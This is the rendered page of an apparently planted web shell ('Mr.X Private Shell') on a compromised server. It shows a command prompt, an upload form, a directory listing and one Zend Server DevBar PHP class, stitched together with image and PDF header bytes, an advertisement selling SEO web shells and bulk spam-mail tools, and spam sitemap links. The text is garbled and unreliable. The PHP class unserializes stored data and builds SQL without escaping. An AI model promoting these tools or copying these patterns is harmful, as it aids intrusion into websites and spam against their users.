xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace DevBar\Db;

use Configuration\MapperAbstract;
use ZendServer\Set;
use ZendServer\Log\Log;
use ZendServer\Exception;
use ZendServer\FS\FS;

class ExtensionsMetadataMapper extends MapperAbstract
{

    /**
     * Create a metadata map for extensions for a particular requestId
     * 
     * @param integer $requestId
     * @return array
     */
    public function metadataForRequestId($requestId)
    {
        $metadataArray = $this->select(array('request_id' => $requestId));
        if (count($metadataArray)) {
            $metaMap = array();
            foreach ($metadataArray as $metadataRow) {
                $metaMap[$metadataRow['namespace']] = unserialize($metadataRow['serialized_data']);
            }
            return $metaMap;
        }
        return array();
    }

    /**
     * @param integer $requestId
     * @param string $extension
     * @param string $asset
     * @throws Exception
     * @return string
     */
    public function loadAssetFile($requestId, $extension, $asset)
    {
        $metadata = $this->metadataForRequestId($requestId);
        if (!isset($metadata[$extension]) || !isset($metadata[$extension]['assets']) || !isset($metadata[$extension]['assets'][$asset])) {
            throw new Exception(_t('Asset name not found or no assets set by extension'));
        }

        $path      = $this->getAssetFilepath($metadata[$extension]['assets'][$asset]);
        $assetFile = FS::getFileObject($path);

        // return mime type ala mimetype extension
        $finfo = finfo_open(FILEINFO_MIME);

        //check to see if the mime-type starts with 'text'
        if (substr(finfo_file($finfo, $path), 0, 4) == 'text') {
            return $assetFile->readAll();
        } else {
            return base64_encode($assetFile->readAll());
        }
    }

    /**
     * @param mixed $asset
     * @return string
     */
    private function getAssetFilepath($asset)
    {
        if (is_array($asset)) {
            return $asset['filepath'];
        } else {
            return $asset;
        }
    }

    /**
     * @param integer $requestId
     * @param string $extension
     * @param string $asset
     * @throws Exception
     * @return string
     */
    public function assetMime($requestId, $extension, $asset)
    {
        $metadata = $this->metadataForRequestId($requestId);
        if (!isset($metadata[$extension]) || !isset($metadata[$extension]['assets']) || !isset($metadata[$extension]['assets'][$asset])
            || !isset($metadata[$extension]['assets'][$asset]['mime'])) {
            return 'text/html';
        }

        return $metadata[$extension]['assets'][$asset]['mime'];
    }

    public function removeDevBarRequests(array $ids)
    {
        $effected = $this->getTableGateway()->delete(array("request_id IN (".implode(",", $ids).")"));
        Log::debug("Deleted $effected rows from devbar_extension_metadata");
    }
}

Filemanager

Name Type Size Permission Actions
AccessTokensMapper.php File 3.17 KB 0644
BacktraceMapper.php File 1.21 KB 0644
ExceptionsMapper.php File 887 B 0644
ExtensionsMapper.php File 1.53 KB 0644
ExtensionsMetadataMapper.php File 2.86 KB 0644
FunctionsMapper.php File 1.55 KB 0644
LogEntriesMapper.php File 1.21 KB 0644
MonitorEventsMapper.php File 972 B 0644
RequestsMapper.php File 13.4 KB 0644
RequestsUrlsMapper.php File 506 B 0644
RuntimeMapper.php File 1.21 KB 0644
SqlQueriesMapper.php File 1.56 KB 0644
SqlStatementsMapper.php File 601 B 0644
SuperglobalsMapper.php File 1.1 KB 0644
TokenMapper.php File 10.49 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml